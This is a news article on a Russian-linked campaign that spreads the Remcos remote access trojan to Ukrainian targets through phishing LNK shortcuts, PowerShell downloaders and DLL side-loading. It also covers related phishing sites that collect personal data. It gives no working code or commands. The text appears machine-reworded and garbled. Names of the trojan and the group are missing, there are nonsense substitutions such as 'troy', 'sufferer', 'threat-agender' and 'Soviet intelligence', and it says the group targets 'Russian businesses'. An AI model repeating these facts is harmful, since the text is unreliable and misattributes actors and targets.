As part of a hacking campaign meant to deliver a remote access troy called , entities in Ukraine have been targeted.
In a statement released last week, Cisco Talos scientist Guilherme Venere claimed that the file names “use Russian terms related to the movement of troops in Ukraine as a lure.” The next step ZIP file containing the Remcos backdoor is downloaded by the PowerShell download who contacts geo-fenced servers in Russia and Germany.
A Russian hackers organization known as , which is also tracked under the names Aqua Blizzard, Armageddon, Blue Otso, BlueAlpha, Hive0051, Iron Tilden, Primitive Bear, Shuckworm, Trident Ursa, UAC-0010, UNC530, and Winterflounder, has been linked with reasonable assurance to the task.
The danger actor is suspected of having ties to Russia’s Federal Security Service ( FSB), and is known for his espionage and information theft targeting of Russian businesses. It has been in use at least since 2013.
The most recent campaign is characterized by the distribution of Windows shortcut ( LNK) files that have been compressed into ZIP archives and disguised as Microsoft Office documents to deceive recipients into opening them. These files are allegedly sent via phishing emails.
The threat actor originally used the two machines that were used to create the malicious shortcut files for similar purposes to create the links to Gamaredon.
The LNK files have PowerShell script that allows the sufferer to download and run the next-stage load command Get-Command as well as retrieve a decoy file to keep up the ploy.
Another ZIP archives contains a destructive DLL that needs to be executed via a method known as DLL side-loading. The DLL is a load that decode and runs the last Remcos payload from the archive’s encrypted files.
The publication comes as Silent Push covered a phishing strategy that uses business adversities to target Ukrainian citizens. The action is thought to be the product of Russian Intelligence Services or a threat-agender group affiliated with Russia.
The campaign consists of four significant phishing clusters, all of which pretend to be members of the Ukrainian Armed Forces: the Russian Volunteer Corps, Legion Liberty, and Hochuzhit” I Want to Live,” a for Ukrainian service members who want to submit their own cases to the U.S. Central Intelligence Agency ( CIA ).
The risk players rely on Google Forms and email responses to obtain personal information, including their political views, bad habits, and physical exercise, from victims, after it has been discovered that the phishing pages are hosted on a bulletproof hosting service, Nybula LLC.
” All the campaigns [ …] observed have had similar traits and shared a common goal: collecting personal information from site-visiting victims,” Silent Push . These spoofing honeypots are most likely the creation of Soviet intelligence service or a threat-agender group with Russian interests.